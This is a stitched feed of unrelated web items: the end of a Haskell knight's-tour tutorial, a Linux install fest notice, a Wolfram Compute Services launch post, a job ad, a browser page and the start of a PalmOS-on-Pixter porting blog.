We take all the possible knight moves and with the help of mapMaybe apply moveState from the current state to every element in the list of moves. mapMaybe takes care of removing all the Nothing entries, so that we end up with a flat list with just the legal states we can reach.

This is actually our first example of using wholemeal programming. Notice how we didn't iterate step by step. Instead of thinking about moving between individual knight moves, we applied the moving logic to the whole list with mapMaybe .

With these helpers we are now ready to create a (potentially) infinite list of all the states that we can be in while searching for a tour from the initial state. Concretely, we need to implement the following signature:

allStatesFrom :: TourState -> [TourState]

Given a single state, we create a list of all the states that can be reached from it.

Creating an infinite list of steps might sound intimidating, but we'll do it anyways:

allStatesFrom state = -- 1

let

next = nextStates state -- 2

allTheRest = concatMap allStatesFrom next -- 3

in

state : allTheRest -- 4

We start from the initial state (1), and we compute all the legal next states using nextStates (2). This is one step into the search. Next, we want to take the next steps from each of these new states. We do it by recursively 9 calling allStatesFrom on each of the next states (3). concatMap flattens all the resulting lists into one big list. We construct the full list of states by prepending the initial state to allTheRest with all the deeper steps (4).

And just like that we have a list that represents all the possible states in the problem we are solving. This is a bit mind-bending, take a moment to let the tricky recursion sink in properly.

Notice how "wholesome" this code is. We don't deal with edge cases or stopping conditions, we just generated the whole thing in one fell swoop. Nor do we worry about going off into infinity, laziness prevents this list from being computed prematurely 10 .

With this list in hand, it's almost trivial to solve the knight's tour problem. We just need to find the first state from the list that covers the whole board.

We can define the stopping condition like so:

isComplete TourState{board, visited} =

boardSize board == length visited

This function determines whether a given state is a solution by checking the size of the list of visited positions (which happens to be the same as the stopping condition in the original Python solution).

With these two building blocks in hand, a list of states and a stopping condition, we can easily compose them into a single solution:

tour :: Board -> KnightPos -> Maybe [KnightMove]

tour board pos = -- 1

let

-- 2

init = initState board pos

-- 3

finalState = find isComplete (allStatesFrom init)

in

fmap getMoves finalState -- 4

Step by step:

  • The final tour function takes in a board and an initial position (1)
  • From this we build the initial state (2), which just initializes a fresh instance of TourState with the current position and an empty list of moves
  • Now for the highlight of this solution, we use find (3) to locate the first TourState that matches isComplete in the full list of states that we generated from the initial state
  • The final result (4) just extracts the moves from the state that we found (which might be missing, hence the fmap call)

I find this approach to be breathtakingly elegant. Thanks to the classic "Why Functional Programming Matters" paper for the inspiration. Not only does it work, but now we have an opportunity to learn something truly novel.

What Did We Learn?

With such a strikingly different solution, we are bound to learn something new. Here are a few lessons that we can take away from this.

Laziness

To generate the list of states we used laziness in an essential, non-contrived way. Without laziness, the list could potentially overflow memory or take too much time to compute upfront, making it impractical to generate "the whole state space".

Haskell's built-in laziness makes this invisibly seamless (for better or for worse), but the lesson that we learn here is applicable almost anywhere. Once we recognize this need for laziness we can use the appropriate technique to achieve it in pretty much any modern language. Be it generators in Python, streams/iterators in Java, or any streaming library in any language.

Laziness, in its conceptual form, is a powerful tool we can use anywhere. And developing an intuition for it from lazy Haskell lists makes the approach to it relatively gentle.

Explicit State Space

The way we went about exploring the state space forced us to actually think about that space. What are the possible states? How do we move between them?

This was explicitly reified in the TourState type and the moveState function.

The state space exists independently of whether we bother to acknowledge it or not. But my feeling is that when thinking imperatively about code it's much easier to "miss the forest for the trees". Focusing on each step we are making in some iterative loop tends to hide the significance of the state space as a whole from us.

Whether or not you're applying functional programming to your code, keeping in mind the state space can only be beneficial. If only for something like " make illegal states unrepresentable ".

Modularity

By separating the exploration of the state space from the stopping condition we made the code much more modular than what it was before. Previously we had to intertwine the stopping condition directly into iteration, but no more.

This kind of modularity opens the door to many possible modifications that we can apply to one part of the code without disturbing the others.

Some examples:

  • We can change the stopping condition without touching the state space exploration logic. Instead of using find to find the first solution, we could search for all solutions. Or we could search only for "closed tours" (where the final cell is adjacent to the initial cell).
  • In the solution code we are exploring the state space using a preorder depth-first traversal. We can easily adapt it to be any other depth-first traversal, or with some more effort we can make it into any traversal order we want.
  • The current algorithm is a naive brute-force approach, we can make things faster by pruning the state space list with heuristics, like applying Warnsdorf's rule .

The important thing is that we can make all these changes by modifying only the code that is responsible for it, without touching its surroundings. This also means that everything can be tested separately without having to test unrelated parts.

Contrast this to the original code where there's no way to modify or test anything without touching everything else. The stopping condition sits smack in the middle of iteration.

That's a level of modularity that takes some effort to achieve with procedural code, but flows out naturally from the wholemeal approach to solving problems.

Composition

Complementing modularity we have composition 11 .

It's one thing to split things into modules, but another thing is how easy it is to compose the modules back into a single piece of code that actually solves the full problem.

In our case it was very easy, just a call to find along with the state space list and the completion predicate. And the same applies to all the different variants described in the previous section. We can easily mix and match the different implementations to generate new working pieces of software.

Using higher-order functions ( find ) as the glue for simple, purely-functional (or side-effect-free) components is a great recipe to obtain code with good composition properties.

Quoting from Tony Morris :

Suppose any function that exists. I will suppose one that is made of parts A, B, C and D. I might denote this A ∘ B ∘ C ∘ D. Now suppose you desire a function that is made of parts A, B, C and E. Then the effort required for your function should be proportional to the effort required for E alone.

The closer you are to achieving this objective for any function, the closer you are to the essence of (pure) functional programming. This exists independently of the programming language, though programming languages will vary significantly in the degree to which they accommodate this objective.

Imperative programming – specifically the scope of a destructive update – is the anti-thesis of this objective.

Wholemeal Programming

Tying all these concepts together is wholemeal programming, showing us how to tackle problems with a wholly different mindset.

Not only does it force us to think differently about problem-solving, but it brings concrete, practical advantages to the code we produce.

Although it's possible to see every one of these advantages in other paradigms, functional programming really shines in making those advantages stand out. Once you learn about them, you can apply them pretty much anywhere. You just need to stop mechanically translating your existing knowledge and break away from everything you think you know.

So what's the point of learning functional programming? You tell me...

Friday Nite Videos | December 5, 2025

Portside
portside.org
2025-12-06 01:36:39
Friday Nite Videos | December 5, 2025 barry Fri, 12/05/2025 - 20:36 ...
Original Article

Friday Nite Videos | December 5, 2025

You Got Gold—A Celebration of John Prine. Trump’s War on Drug Traffickers ... Except This One. Gaza Children Return to School! This Island Might Help Us Understand the Origins of Life. Zohran Mamdani & Bernie Sanders Join Striking Starbucks Workers

Portside Portside

Linux Instal Fest Belgrade

Hacker News
dmz.rs
2025-12-06 10:20:19
Comments...
Original Article

Where and when

Linux Install Fest will be held on December 9, 2025 in the JAG3 classroom of the Faculty of Mathematics, at Jagićeva 5, Belgrade . Entry to the classroom is possible from 6 pm to 9 pm.

Jagićeva street is located between the Pijaca Đeram station where trams 5, 6, 7L and 14 stop, and the Crveni krst station where buses 21 and 83 stop, as well as trolleybuses 19, 22 and 29.

Program schedule

The goal of the gathering is to help interested install the Linux operating system on laptops. Several people with working Linux experience will be present at the event. In addition, depending on the interest of those present, short trainings related to the command line, git, web services, C programming, etc. can be held.

After 9 p.m., we can continue socializing in one of the nearby bars.

Linux distributions

Linux is the core of the operating system, on which other programs are installed. All of these together make up a particular Linux distribution . There are many distributions, but we recommend the ones with a long tradition like the following:

  • The Debian distribution is probably the most suitable for Linux beginners. Known derivatives of Debian are Ubuntu, Mint and Zorin.
  • Fedora is also suitable for Linux beginners. It differs from the Debian distribution by the faster release of new versions, which in practice means that users have newer versions of the program, but the system can be potentially more unstable than Debian.
  • Arch is a Linux distribution that allows the user to easily configure all parts of the system. This distribution is intended for people with significant Linux experience.

If you are a beginner and haven't decided which distribution you want to install, we recommend Fedora or Debian. Regardless of which distribution you have, you will be able to run all programs intended for Linux.

End of 10

This year's Linux Install Fest is organized as part of the global End of 10 campaign, which promotes the Linux operating system as a replacement for Windows 10.

For a long time now, the Windows operating system has become increasingly unfriendly to users. On the contrary, many Linux distributions have improved the user experience to the maximum, and today we can claim that Linux enables significantly more pleasant work, regardless of the user's technical knowledge.

Windows imposes on users functionalities that users do not want to use, such as: cloud integrations, AI, advertisements, mandatory accounts, and the like. These functionalities serve above all to increase Microsoft's profits, and have no benefit for most end users. Also, basic programs such as calendars, calculators or text editors have become slow and full of bugs. With useless functionalities, Windows becomes more demanding every year and requires the purchase of better hardware, leading to an increase in electronic waste. Unlike Windows, the latest Linux distributions work very well on computers that are more than a decade old.

The choice of an operating system is no longer just a technical decision, but also an environmental attitude.

Installation methods

We can install Linux in three ways:

  1. Inside a virtual machine on Windows. In this way, the user retains his existing operating system and the data on it. Linux in a virtual machine will be significantly slower than an installation without virtualization.
  2. In addition to the existing operating system. If it is possible to shrink one of your partitions and free up at least 10GB of space, you can install a Linux operating system in addition to Windows. When booting the computer, the user will be able to choose whether to boot Windows or Linux. With such an installation, there is a certain risk that one of the subsequent Windows updates will reset the bootloader settings, after which a small intervention is required to make the Linux system accessible again.
  3. By completely removing the Windows system. In place of the Windows partition, a new partition with the Linux distribution will be placed. Additional partitions that exist may or may not be removed.

Before arrival

In order for the installation to be effective, before coming to the Linux Instal Fest, it is necessary to make a backup of the data from the system partition if you decide on the second or third installation option. If you have two partitions (for example, C and D), move the data from the system partition (C:) that you want to keep to the non-system partition (D:). If you don't have an additional partition, you can use a USB flash drive. Pay attention to the files inside the user directory (Desktop, Downloads, Documents,... ), and export bookmarks and passwords from the browser.

Also, before your arrival, you can familiarize yourself with the appearance and way of functioning of various Linux distributions. You can try some Linux distributions through the browser, without any installation, on the DistroSea website (sometimes it is necessary to wait a short time to free up resources on the site). Please note that the operating system on this site is many times slower than the system installed on your computer.

Organizer

The organizer of the event is Decentrala - a group of enthusiasts gathered around the ideas of decentralization and free dissemination of knowledge. So far, we have organized more than 300 events , and we regularly announce the next events on the Events page.

In the following period, two more events for Linux beginners will be held at the same location (classroom JAG3):

  • Tuesday December 16 - Introduction to the Linux command line
  • Tuesday, December 23 - Introduction to Git

Events start at 6pm.

Ponovo

You can bring defective devices to the Linux install fest: laptops, phones, desktop computers, monitors... We will deliver them to the organization Ponovo in Kikinda during January. This organization will repair these devices and thereby prevent the increase of electronic waste.

Ask HN: How many people got VPNs in response to laws like UK Online Safety Act?

Hacker News
news.ycombinator.com
2025-12-06 09:28:59
Comments...
Original Article

I was trying to follow a tutorial the other day and couldn't because the embedded images were on Imgur and it was so frustrating. It was the straw that broke the camel's back.

I caved, bought a 3 year PIA plan, had my router configured within about 2 minutes (actually impressed how straightforward Unifi made it) and now my browsing experience is fixed.

Schizophrenia sufferer mistakes smart fridge ad for psychotic episode

Hacker News
old.reddit.com
2025-12-06 07:31:07
Comments...
Original Article

whoa there, pardner!

Your request has been blocked due to a network policy.

Try logging in or creating an account here to get back to browsing.

If you're running a script or application, please register or sign in with your developer credentials here . Additionally make sure your User-Agent is not empty and is something unique and descriptive and try again. if you're supplying an alternate User-Agent string, try changing back to default as that can sometimes result in a block.

You can read Reddit's Terms of Service here .

If you think that we've incorrectly blocked you or you would like to discuss easier ways to get the data you want, please file a ticket here .

When contacting us, please include your Reddit account along with the following code:

2c617423-da1c-4866-98b8-75cf56cfd360

Wolfram Compute Services

Hacker News
writings.stephenwolfram.com
2025-12-06 07:21:42
Comments...
Original Article

Instant Supercompute: Launching Wolfram Compute Services

To immediately enable Wolfram Compute Services in Version 14.3 Wolfram Desktop systems, run

RemoteBatchSubmissionEnvironment["WolframBatch"]

.

(The functionality is automatically available in the Wolfram Cloud .)

Scaling Up Your Computations

Let’s say you’ve done a computation in Wolfram Language . And now you want to scale it up. Maybe 1000x or more. Well, today we’ve released an extremely streamlined way to do that. Just wrap the scaled up computation in RemoteBatchSubmit and off it’ll go to our new Wolfram Compute Services system . Then—in a minute, an hour, a day, or whatever—it’ll let you know it’s finished, and you can get its results.

For decades I’ve often needed to do big, crunchy calculations ( usually for science ). With large volumes of data, millions of cases, rampant computational irreducibility , etc. I probably have more compute lying around my house than most people—these days about 200 cores worth. But many nights I’ll leave all of that compute running, all night—and I still want much more. Well, as of today, there’s an easy solution—for everyone: just seamlessly send your computation off to Wolfram Compute Services to be done, at basically any scale.

For nearly 20 years we’ve had built-in functions like ParallelMap and ParallelTable in Wolfram Language that make it immediate to parallelize subcomputations. But for this to really let you scale up, you have to have the compute. Which now—thanks to our new Wolfram Compute Services—everyone can immediately get.

The underlying tools that make Wolfram Compute Services possible have existed in the Wolfram Language for several years. But what Wolfram Compute Services now does is to pull everything together to provide an extremely streamlined all-in-one experience. For example, let’s say you’re working in a notebook and building up a computation. And finally you give the input that you want to scale up. Typically that input will have lots of dependencies on earlier parts of your computation. But you don’t have to worry about any of that. Just take the input you want to scale up, and feed it to RemoteBatchSubmit . Wolfram Compute Services will automatically take care of all the dependencies, etc.

And another thing: RemoteBatchSubmit , like every function in Wolfram Language, is dealing with symbolic expressions, which can represent anything—from numerical tables to images to graphs to user interfaces to videos, etc. So that means that the results you get can immediately be used, say in your Wolfram Notebook, without any importing, etc.

OK, so what kinds of machines can you run on? Well, Wolfram Compute Services gives you a bunch of options , suitable for different computations, and different budgets. There’s the most basic 1 core, 8 GB option—which you can use to just “get a computation off your own machine”. You can pick a machine with larger memory—currently up to about 1500 GB. Or you can pick a machine with more cores—currently up to 192. But if you’re looking for even larger scale parallelism Wolfram Compute Services can deal with that too. Because RemoteBatchMapSubmit can map a function across any number of elements, running on any number of cores, across multiple machines.

A Simple Example

OK, so here’s a very simple example—that happens to come from some science I did a little while ago . Define a function PentagonTiling that randomly adds nonoverlapping pentagons to a cluster:

For 20 pentagons I can run this quickly on my machine:

But what about for 500 pentagons? Well, the computational geometry gets difficult and it would take long enough that I wouldn’t want to tie up my own machine doing it. But now there’s another option: use Wolfram Compute Services!

And all I have to do is feed my computation to RemoteBatchSubmit :

Immediately, a job is created (with all necessary dependencies automatically handled). And the job is queued for execution. And then, a couple of minutes later, I get an email:

Email confirming batch job is starting

Not knowing how long it’s going to take, I go off and do something else. But a while later, I’m curious to check how my job is doing. So I click the link in the email and it takes me to a dashboard—and I can see that my job is successfully running:

Wolfram Compute Services dashboard

I go off and do other things. Then, suddenly, I get an email:

Email confirming batch job success

It finished! And in the mail is a preview of the result. To get the result as an expression in a Wolfram Language session I just evaluate a line from the email:

And this is now a computable object that I can work with, say computing areas

or counting holes:

Large-Scale Parallelism

One of the great strengths of Wolfram Compute Services is that it makes it easy to use large-scale parallelism. You want to run your computation in parallel on hundreds of cores? Well, just use Wolfram Compute Services!

Here’s an example that came up in some recent work of mine. I’m searching for a cellular automaton rule that generates a pattern with a “lifetime” of exactly 100 steps. Here I’m testing 10,000 random rules—which takes a couple of seconds, and doesn’t find anything:

To test 100,000 rules I can use ParallelSelect and run in parallel, say across the 16 cores in my laptop:

Still nothing. OK, so what about testing 100 million rules? Well, then it’s time for Wolfram Compute Services. The simplest thing to do is just to submit a job requesting a machine with lots of cores (here 192, the maximum currently offered):

A few minutes later I get mail telling me the job is starting. After a while I check on my job and it’s still running:

Email confirming batch job is starting

I go off and do other things. Then, after a couple of hours I get mail telling me my job is finished. And there’s a preview in the email that shows, yes, it found some things:

Email confirming batch job success

I get the result:

And here they are—rules plucked from the hundred million tests we did in the computational universe:

But what if we wanted to get this result in less than a couple of hours? Well, then we’d need even more parallelism. And, actually, Wolfram Compute Services lets us get that too—using RemoteBatchMapSubmit . You can think of RemoteBatchMapSubmit as a souped up analog of ParallelMap —mapping a function across a list of any length, splitting up the necessary computations across cores that can be on different machines, and handling the data and communications involved in a scalable way.

Because RemoteBatchMapSubmit is a “pure Map ” we have to rearrange our computation a little—making it run 100,000 cases of selecting from 1000 random instances:

The system decided to distribute my 100,000 cases across 316 separate “child jobs”, here each running on its own core. How is the job doing? I can get a dynamic visualization of what’s happening:

And it doesn’t take many minutes before I’m getting mail that the job is finished:

Email providing job details

And, yes, even though I only had to wait for 3 minutes to get this result, the total amount of computer time used—across all the cores—is about 8 hours.

Now I can retrieve all the results, using Catenate to combine all the separate pieces I generated:

And, yes, if I wanted to spend a little more, I could run a bigger search, increasing the 100,000 to a larger number; RemoteBatchMapSubmit and Wolfram Compute Services would seamlessly scale up.

It’s All Programmable!

Like everything around Wolfram Language, Wolfram Compute Services is fully programmable. When you submit a job, there are lots of options you can set. We already saw the option RemoteMachineClass which lets you choose the type of machine to use. Currently the choices range from " Basic1x8 " (1 core, 8 GB) through " Basic4x16 " (4 cores, 16 GB) to “parallel compute” " Compute192x384 " (192 cores, 384 GB) and “large memory” " Memory192x1536 " (192 cores, 1536 GB).

Different classes of machine cost different numbers of credits to run. And to make sure things don’t go out of control, you can set the options TimeConstraint (maximum time in seconds) and CreditConstraint (maximum number of credits to use).

Then there’s notification. The default is to send one email when the job is starting, and one when it’s finished. There’s an option RemoteJobName that lets you give a name to each job, so you can more easily tell which job a particular piece of email is about, or where the job is on the web dashboard. (If you don’t give a name to a job, it’ll be referred to by the UUID it’s been assigned.)

The option RemoteJobNotifications lets you say what notifications you want, and how you want to receive them. There can be notifications whenever the status of a job changes, or at specific time intervals, or when specific numbers of credits have been used. You can get notifications either by email, or by text message. And, yes, if you get notified that your job is going to run out of credits, you can always go to the Wolfram Account portal to top up your credits.

There are many properties of jobs that you can query. A central one is "EvaluationResult" . But, for example, " EvaluationData " gives you a whole association of related information:

If your job succeeds, it’s pretty likely "EvaluationResult" will be all you need. But if something goes wrong, you can easily drill down to study the details of what happened with the job, for example by looking at "JobLogTabular" .

If you want to know all the jobs you’ve initiated, you can always look at the web dashboard, but you can also get symbolic representations of the jobs from:

For any of these job objects, you can ask for properties, and you can for example also apply RemoteBatchJobAbort to abort them.

Once a job has completed, its result will be stored in Wolfram Compute Services—but only for a limited time (currently two weeks). Of course, once you’ve got the result, it’s very easy to store it permanently, for example, by putting it into the Wolfram Cloud using CloudPut [ expr ]. (If you know you’re going to want to store the result permanently, you can also do the CloudPut right inside your RemoteBatchSubmit .)

Talking about programmatic uses of Wolfram Compute Services, here’s another example: let’s say you want to generate a compute-intensive report once a week. Well, then you can put together several very high-level Wolfram Language functions to deploy a scheduled task that will run in the Wolfram Cloud to initiate jobs for Wolfram Compute Services:

And, yes, you can initiate a Wolfram Compute Services job from any Wolfram Language system, whether on the desktop or in the cloud.

And There’s More Coming…

Wolfram Compute Services is going to be very useful to many people. But actually it’s just part of a much larger constellation of capabilities aimed at broadening the ways Wolfram Language can be used.

Mathematica and the Wolfram Language started—back in 1988 —as desktop systems. But even at the very beginning, there was a capability to run the notebook front end on one machine, and then have a “ remote kernel ” on another machine. (In those days we supported, among other things, communication via phone line!) In 2008 we introduced built-in parallel computation capabilities like ParallelMap and ParallelTable . Then in 2014 we introduced the Wolfram Cloud —both replicating the core functionality of Wolfram Notebooks on the web, and providing services such as instant APIs and scheduled tasks . Soon thereafter, we introduced the Enterprise Private Cloud —a private version of Wolfram Cloud. In 2021 we introduced Wolfram Application Server to deliver high-performance APIs (and it’s what we now use, for example, for Wolfram|Alpha ). Along the way, in 2019, we introduced Wolfram Engine as a streamlined server and command-line deployment of Wolfram Language. Around Wolfram Engine we built WSTPServer to serve Wolfram Engine capabilities on local networks, and we introduced WolframScript to provide a deployment-agnostic way to run command-line-style Wolfram Language code. In 2020 we then introduced the first version of RemoteBatchSubmit , to be used with cloud services such as AWS and Azure . But unlike with Wolfram Compute Services, this required “do it yourself” provisioning and licensing with the cloud services. And, finally, now, that’s what we’ve automated in Wolfram Compute Services.

OK, so what’s next? An important direction is the forthcoming Wolfram HPCKit—for organizations with their own large-scale compute facilities to set up their own back ends to RemoteBatchSubmit , etc. RemoteBatchSubmit is built in a very general way, that allows different “ batch computation providers ” to be plugged in. Wolfram Compute Services is initially set up to support just one standard batch computation provider: "WolframBatch" . HPCKit will allow organizations to configure their own compute facilities (often with our help) to serve as batch computation providers, extending the streamlined experience of Wolfram Compute Services to on-premise or organizational compute facilities, and automating what is often a rather fiddly job process of submission (which, I must say, personally reminds me a lot of the mainframe job control systems I used in the 1970s).

Wolfram Compute Services is currently set up purely as a batch computation environment. But within the Wolfram System, we have the capability to support synchronous remote computation, and we’re planning to extend Wolfram Compute Services to offer this—allowing one, for example, to seamlessly run a remote kernel on a large or exotic remote machine.

But this is for the future. Today we’re launching the first version of Wolfram Compute Services. Which makes “supercomputer power” immediately available for any Wolfram Language computation. I think it’s going to be very useful to a broad range of users of Wolfram Language. I know I’m going to be using it a lot.

Infracost (YC W21) is hiring Sr Node Eng to make $600B/yr cloud spend proactive

Hacker News
www.ycombinator.com
2025-12-06 07:00:14
Comments...
Original Article

Shift FinOps Left: Proactively Find & Fix Cloud Cost Issues

Senior Product Engineer (Node.js)

$90K - $170K Remote

Role

Engineering, Full stack

Visa

US citizenship/visa not required

Skills

Node.js, React, TypeScript, PostgreSQL

Connect directly with founders of the best YC-funded startups.

Apply to role ›

About the role

Help engineers fix what matters. You’ll work closely with PMs, designers, and engineers to build fast, reliable backends that power real-time infrastructure insights for thousands of engineers.

What we’re looking for:

  • GMT+2 to GMT-6 time zone
  • Strong Node.js and TypeScript experience. You know how to track down memory leaks and performance issues.
  • You can write complex PostgreSQL queries, understand query plans, and know when to reach for indexes, window functions, or CTEs. You’ve debugged deadlocks, optimized slow queries, and can untangle gnarly data models.
  • You move fast. You get a dopamine hit every time you release to production, and jump on issues without hesitation.
  • You've built something from scratch that you're proud of.
  • You’ll thrive in an amazing, experienced, hardworking, respectful, supportive, and fun team.
  • (Preferred) You've worked with GraphQL and understand how to design flexible, efficient schemas.

Examples of challenges we have worked on recently:

  • Scaled to support customers with thousands of GitHub organizations and tens of thousands of repositories . This has required us to overhaul our APIs, interfaces, onboarding processes, infrastructure, and more.
  • Automatically fixing infrastructure issues . With infrastructure changes there's a lower tolerance for AI-generated slop - there's not the same safety nets in terms of testing and the risk is often higher. We've been iterating on our system that combines the AI-generated changes with our best-in-class static analysis engine to robustly open good-quality PRs to fix the most important issues for our customers.
  • Built the Issue Explorer**,** a frontend and backend system for surfacing infrastructure issues at scale . We had to balance performance, UX, and data complexity to let enterprise customers filter, group, and chart tens of thousands of issues across their entire codebase.

What we value:

  1. Ustomer, not customer : It is all about seeing us and the customer as one. We like to be a part of the user’s team, and help them however we can. If the user is not successful, then we will not be either so we try to walk in their shoes. It's more than work - we build relationships and community with users and customers.
  2. Open is our core : Put yourself out there. Show your learning. Transparency builds confidence. Encourage sharing the good and the bad. The best decisions are made when everyone has access to all the data. Be straightforward and kind, feedback is about your work not your person.
  3. Let's JEDI : Let’s Just Effing Do It! Own it and move fast. A good plan fiercely executed now is better than a perfect plan later. We ask for help and unblock each other. The main thing, is to keep the main thing, the main thing.

Benefits:

  • Work remotely, no commuting
  • Regular company meet-ups
  • Employee-friendly equity terms, including a 10 year exercise window
  • 401k matching (US)
  • Health, dental, and vision insurance (US)
  • 31 days paid leave per year (includes national holidays)
  • 12 weeks paid parental leave

About the interview

  • 25 minute initial chat
  • Two or three 55 minute technical interviews (including code walkthrough)
  • 55 minute value-based interview

About Infracost

$600B is spent on cloud each year, but no one knows the cost until it's too late. We’re changing that.

Since launching Infracost in 2021, we’ve been pulled by engineers who all want to Shift FinOps Left . We enable them to proactively find and fix cloud cost issues before they hit production. We plug directly into developer workflows (like GitHub and Azure Repos), show cost impact in pull requests, enforce tagging and FinOps best practices, and even generate PRs to fix issues automatically.

We're backed by Sequoia, YC and trusted by Fortune 500 enterprises. You'll join a small, experienced, and supportive team that's shipping fast, solving real infrastructure problems, and having fun while doing it.

Whether you're an engineer tackling complex systems (e.g. parsing massive Terraform repos, scaling real-time systems), a product manager shaping strategy from real customer pain points, or a customer success lead working directly with users; there’s meaningful work here for you. If you care about cloud efficiency, great UX, and helping teams move faster and smarter, we’d love to work with you!

Infracost

Founded: 2020

Batch: W21

Team Size: 20

Status: Active

Founders

Nook Browser

Hacker News
browsewithnook.com
2025-12-06 03:32:56
Comments...
Original Article

Browse. It's yours.
Open-source, Private, Forever.

The memory of web browsing being quick and easy lives with us all. Fewer pop-ups, less clutter, and finding what you need ASAP.

Frequently asked questions

Fast by design

Minimal overhead. Less clutter. Pages feel instant, powered by WebKit.

Optional, Opt-In AI

When enabled, they provide helpful tools such as chat assistance, summaries, up-to-date web insights, and more.

Open-source forever

Transparent code, permissive license, and a community-driven roadmap.

Our pledge

  • No selling of browsing data. Ever.
  • Features ship when they’re stable and accessible.
  • We keep settings understandable and reversible.

Browser

Frequently asked questions

Albert Michelson's Harmonic Analyzer (2014) [pdf]

Hacker News
engineerguy.com
2025-12-06 03:21:46
Comments...
Original Article
No preview for link for known binary extension (.pdf), Link: https://engineerguy.com/fourier/pdfs/albert-michelsons-harmonic-analyzer.pdf.

PalmOS on FisherPrice Pixter Toy

Hacker News
dmitry.gr
2025-12-06 03:17:44
Comments...
Original Article

rePalm Photo Album (constantly updated)

Table of Contents

  1. Blog-style updates
    1. BLOG
    2. Dec 5, 2025 - Pixter
      1. Getting started with Pixter
      2. Initial Slow Pixter Color Bringup
      3. The Worst ARM SoC I've Seen Yet
      4. Pixter Memories
      5. Pixter Displays
      6. Making Pixter IrDA work
      7. Getting and Flashing the Pixter Carts
      8. Pixter Polish
      9. Battery State
      10. ARM7 quirks
        1. What exactly does ARM7 do with PC[1] in ARM mode?
      11. Pixter Multimedia
      12. Some More Pixter Polish
      13. Pixter Results
    3. Nov 2, 2025 - summary of what you missed
  2. The original article about the start of the project
    1. PalmOS Architecture (and a bit of history)
      1. History
      2. Modules? Libraries? DALs? Drivers?
    2. Towards the first unauthorized PalmOS port
      1. So what's so hard?
      2. ROM formats are hard
      3. So write a DAL and you're done!
      4. Minimal DAL
      5. Drawing is hard
      6. Theft is a form of flattery, right?
      7. Meticulously-performed imitation is also a form of flattery, no?
      8. Virtual SD card
      9. Which device ROM are you using?
      10. So you're done, right? It works?
    3. Towards the first pirate PalmOS device
      1. A little bit about normal PalmOS 5.x devices, their CPUs, and the progress since...
      2. ARMv7M
      3. My kingdom for an ARM!
      4. But what if we try?
    4. We need hardware, but developing on hardware is ... hard
      1. CortexEmu to the rescue
      2. Waaaah! You promised real hardware
    5. Um, but now we need a kernel...
      1. Need a kernel? Why not Linux?
    6. So, uh, what about all that pesky ARM code?
      1. The ARM code still was a problem
      2. You do not mean...?
      3. But isn't writing an emulator in C kind of slow?
      4. So, is it fast enough now?
    7. You do not mean...? (pt2)
      1. Just in time: this
      2. JITs: how do we start?
      3. Parlez-vous ARM?
      4. 2 Thumbs do not make an ARM
    8. A JIT's job is never over
      1. LDM and STM, may they burn in hell forever!
        1. How LDM/STM work in ARM
        2. How LDM/STM work in Thumb2
        3. But wait, there's more ... pain
        4. Translating LDM/STM
      2. Slightly less hellish instructions
      3. Conditional instructions
      4. Jumps & Calls
      5. Translating a TU
      6. And if the TC is full?
      7. Growing up
      8. The Cortex-M0 backend
        1. Why this is insane
        2. The basics
        3. Fault dispatching
    9. Is PACE fast enough?
      1. Those indirect jumps...
      2. A special solution for a special problem
      3. Any 68k emulator...
    10. But, you promised hardware...
      1. Hardware has bugs
      2. So why the 0x80000000 limit?
      3. Two wrongs do not make a right, but do two nasty hacks?
    11. Tales of more PalmOS reverse engineering
      1. SD-card Support
      2. Serial Port Support
        1. Yes, you can try it!
      3. Vibrate & LED support
      4. Networking support (WIP)
        1. False starts
        2. The scary way forward
        3. Those who study history...
        4. On to OS 5's Net.lib
        5. I found a bug!
        6. Well, that was easy...
        7. NOT!
        8. More reverse engineering
      5. 1.5 density support
        1. Density basics
        2. How does it all fall apart?
        3. How do we fix it?
        4. And now, for some polish
      6. Dynamic Input Area/Pen Input Manager Services support
        1. DIA/PINS basics
        2. How it works pre-garnet
        3. The intricacies of writing a DIA implementation
      7. Audio support
        1. PalmOS Audio basics
        2. PalmOS sampled sudio support
        3. Why audio is hard & how PalmOS makes it easy
        4. How rePalm does audio mixing
        5. How do assembly and audio mix?
        6. rePalm's audio hw driver architecture
        7. Microphone
      8. Zodiac support
        1. Tapwave Zodiac primer
        2. The reverse engineering
        3. The "GPU"
        4. Other Tapwave APIs
    12. Real hardware: reSpring
      1. The ultimate Springboard accessory
      2. Interfacing with the Visor
      3. Version 1
      4. Bringup of v1
      5. Let's stick it into a Visor?
        1. Getting recognized
        2. Saving valuable space
        3. Communications
        4. Early Visor support
      6. Making it work well
        1. Initial data
        2. Sending display data
        3. Buttons, pen, brightness, contrast, and battery info
        4. Microphone support
      7. Polish
        1. Serial/IrDA
        2. Alarm LED
        3. Software update
      8. Onboard NAND
        1. You wanted pain? Here's some NAND
        2. To write an FTL...
      9. One final WTF
    13. More real hardware
      1. rePalm-MSIO
        1. MCU selection
        2. The bugs...
        3. MSIO low level
        4. MSIO high level
        5. MSIO performance
        6. Other loose ends
      2. AximX3
      3. STM32F469 Discovery Board
      4. RP2040
        1. It is possible!
        2. Memories
        3. PACE again
    14. So where does this leave us?
    15. Source Code
      1. Source intro
      2. Building basics
      3. Building PACE
    16. Article update history
    17. Comments...

Blog-style updates

BLOG

I have decided to change the format of this article to be more blog-like as further development is being done in parallel on many fronts and will be hard to follow if I just update the main (now-huge) article body. So what has transpired since?

Dec 5, 2025 - Pixter

Pixter Color showing PalmOS 5.2.1 infor panel

Getting started with Pixter

Fisher-Price (owned by Mattel) produced some toys in the early 2000 under the Pixter brand. They were touchscreen-based drawing toys, with cartridge-based extra games one could plug in. Pixter devices of the first three generations ("classic", "plus", and "2.0") featured 80x80 black-and-white screens, which makes them of no interest for rePalm. The last two generations of Pixter ("color" and "multimedia") featured 160x160 color displays. Now, this was more like it! Pixter was quite popular, as far as kids' toys go, in USA in the early 2000s. A friend brought it to my attention a year ago as a potential rePalm target. The screen resolution was right and looking inside a "Pixter Color" showed an ARM SoC - a Sharp LH75411 . The device had sound (games made noises), and touch panel was resistive. In theory - a viable rePalm target indeed.

